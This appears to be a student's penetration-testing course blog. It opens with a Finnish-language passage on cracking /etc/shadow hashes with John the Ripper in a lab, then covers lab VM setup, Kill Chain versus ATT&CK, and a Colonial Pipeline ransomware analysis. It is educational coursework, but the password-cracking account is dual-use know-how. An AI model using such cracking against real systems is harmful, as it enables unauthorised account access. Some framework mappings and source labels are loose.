John aloittanut etismään sopivat salasanat brute force menetelmällä. top komennolla voi seurata prosesseja ja järjestelmän resurssien käyttöä. John prosessi oli käyttänyt melkein 99% CPU:n kapasiteetista.

Lopulta John löysi salasanat kolmelle /etc/shadow tiedostossa olevalle käyttäjätunnukselle: sys, klog, service. Neljälle tunnukselle sanakirjasta ei löytynyt salasanaa. Käyttämällä laajempia sanakirjoja ja kustamoituja sanakirjoja voidaan nostaa todenäköisyyttä arvata muitakin salasanoja

Lähde: https://erev0s.com/blog/cracking-etcshadow-john/


Homework 1

h1 Adversarial mindset

Install Debian on Virtualbox.

I’ll start with the simplest, by installing the Debian Linux distribution on a virtual machine. I did this for another course that started at the same time as this one. In this post, I will describe how I did it.

For the Penetration testing course, I downloaded a Xubuntu 20.04.4 desktop image, a Kali 2022.1 installer image, and a Kali 2022.1 VMWare virtual machine. I had VMWare Workstation PRO 15 installed on my laptop and I have some experience installing Unix and Linux systems. So it was not difficult for me to install three virtual machines with the following parameters.

– HDD 20 GB
– Network NAT

All of these machines are connected to a virtual network that is connected to the local network using network address translation (NAT).

After the installation was complete, I had to change the passwords for the admin users and update and upgrade packages on Linux operating systems with the following command.

$ sudo apt-get update
$ sudo apt-get upgrade


I also installed ufw on all VMs and opened port 22 for remote access via ssh protocol. I am using the MobaXterm client installed on the host machine to access remote hosts via SSH.

So as a result, I have three Debian distribution VMs because Ubuntu/Xubuntu and Kali are just variations of the popular Debian Linux distribution.


How would you compare Cyber Kill Chain and ATT&CK Enterprise matrix? Who do you think could benefit from these models?


ATT&CK is a kind of periodic table that lists and organizes the actions of attackers in an accessible and user-friendly format. This is a lower-level model that describes tactics, techniques, procedures, etc. of known hacking methods. Cyber Kill Chain uses ordered phases to describe high-level achievement goals.

Cyber Kill has a well-defined linear sequence of phases, the ATT&CK structure is a matrix of intrusion techniques that is not limited to a specific order of operations. Models can be combined and used by security professionals to prevent and stop attacks and detect illegal activity on a corporate network.



Francisco Cosio https://www.brierandthorn.com/post/spot-the-difference-mitre-framework-vs-lockheed-martin-kill-chain-cyber-kill-chain

Dave Farquhar https://dfarq.homeip.net/cyber-kill-chain-vs-mitre-attck/

AttackIQ https://attackiq.com/mitre-attack/matrix/


Pick a security incident and learn about it. Write briefly about it. Point out the concepts of the threat actor, exploit, vulnerability and (business) impact.


I chose one of the most famous cases that have occurred recently. Cyberattack on Colonial Pipeline (May 7, 2021) is a malware attack on the US Colonial Pipeline system.

Attack shut down all system pipelines for five days. The company said the attackers only targeted its corporate IT networks and not the pipeline’s protection and security systems, but it shut down the pipeline anyway as a precaution. However, some experts noticed that Colonial closed its pipeline due to the fact that its billing system suffered, and there was no way to get paid for fuel.

Darknet hacker group hacked Colonial Pipeline’s network using a compromised VPN account. According to a statement from Colonial Pipeline, the cyberattack on its systems was carried out using a ransomware virus, which temporarily blocks its operation and encrypts data until the victim of a cyber-attack pays the amount demanded by hackers.

Mr. Charles Carmakal from FireEye, a Mandiant security company, which helped Colonial Pipeline investigate the attack, stated that the VPN login, which remains the earliest known hack in the attack, was that of an employee who was not believed to be active yet. He added that the employee “may have used” the password on another website that had previously been compromised. “Carmakal added that the credentials have been removed and multi-factor authentication has been implemented as part of the recovery.” (TechTarget)

The company paid the attackers a ransom in bitcoins in the amount of approximately $4.4 million. Most of the money was returned by hacking the bitcoin wallet of the attackers. In addition to the financial loss, the company’s reputation was badly damaged by the incident. After an investigation, the case was heard in House Committee on Homeland Security US Congress

Krebs on Security https://krebsonsecurity.com/2021/06/justice-dept-claws-back-2-3m-paid-by-colonial-pipeline-to-ransomware-gang/
House Committee on Homeland Security, US Congress
Video: https://homeland.house.gov/activities/hearings/cyber-threats-in-the-pipeline-using-lessons-from-the-colonial-ransomware-attack-to-defend-critical-infrastructure
Text: https://www.govinfo.gov/content/pkg/CHRG-117hhrg45085/html/CHRG-117hhrg45085.htm
TechTarget https://www.techtarget.com/searchsecurity/news/252502216/Mandiant-Compromised-Colonial-Pipeline-password-was-reused


Use either (Hutchins et al 2011) cyber kill chain or MITRE ATT&CK framework for analyzing the incident you used in a. You can pick any incident you want, but try to pick a source that gives you enough technical and business detail to do some analysis.


I’m trying to analyze the Colonial Pipeline ransomware attack using Cyber Kill Chain because there is not enough information about this attack from public sources, which prevents a more technical analysis of this case.


As it became known, the attack was carried out using the account of one of the employees of the Colonial Pipeline company. The media reported that the password may have been used on another compromised site. Perhaps in this way, the attackers were able to gain access to the corporate network.

Preparing hacking tools is an integral part of every attack. Specifically, in this case, most likely the malware used was obtained from the REvil group, which provided it using the Ransomware-as-a-service model.

The malware was delivered using an employee’s VPN account. The account was not protected by an MFA, which made it easier for hackers

Elevation exploits may have been used inside the corporate network, as subsequent actions required higher permissions.

At this point, the attackers installed Ransomware on the system responsible for billing customers. At the same time, they downloaded about 100 gigabytes of data, which they later threatened to publish.

Command and Control:
At night, when fewer employees were at work, the attackers launched Ransomware, which encrypted the data on the system disks.

Actions on Objective:
At 5 a.m., a company employee received a ransom demand for providing an encryption key to decrypt the data.



TechTarget https://thehackernews.com/2021/06/hackers-breached-colonial-pipeline.html

TechTarget https://thehackernews.com/2021/05/ransomware-cyber-attack-forced-largest.html

Cybereason https://www.cybereason.com/blog/research/cybereason-vs-darkside-ransomware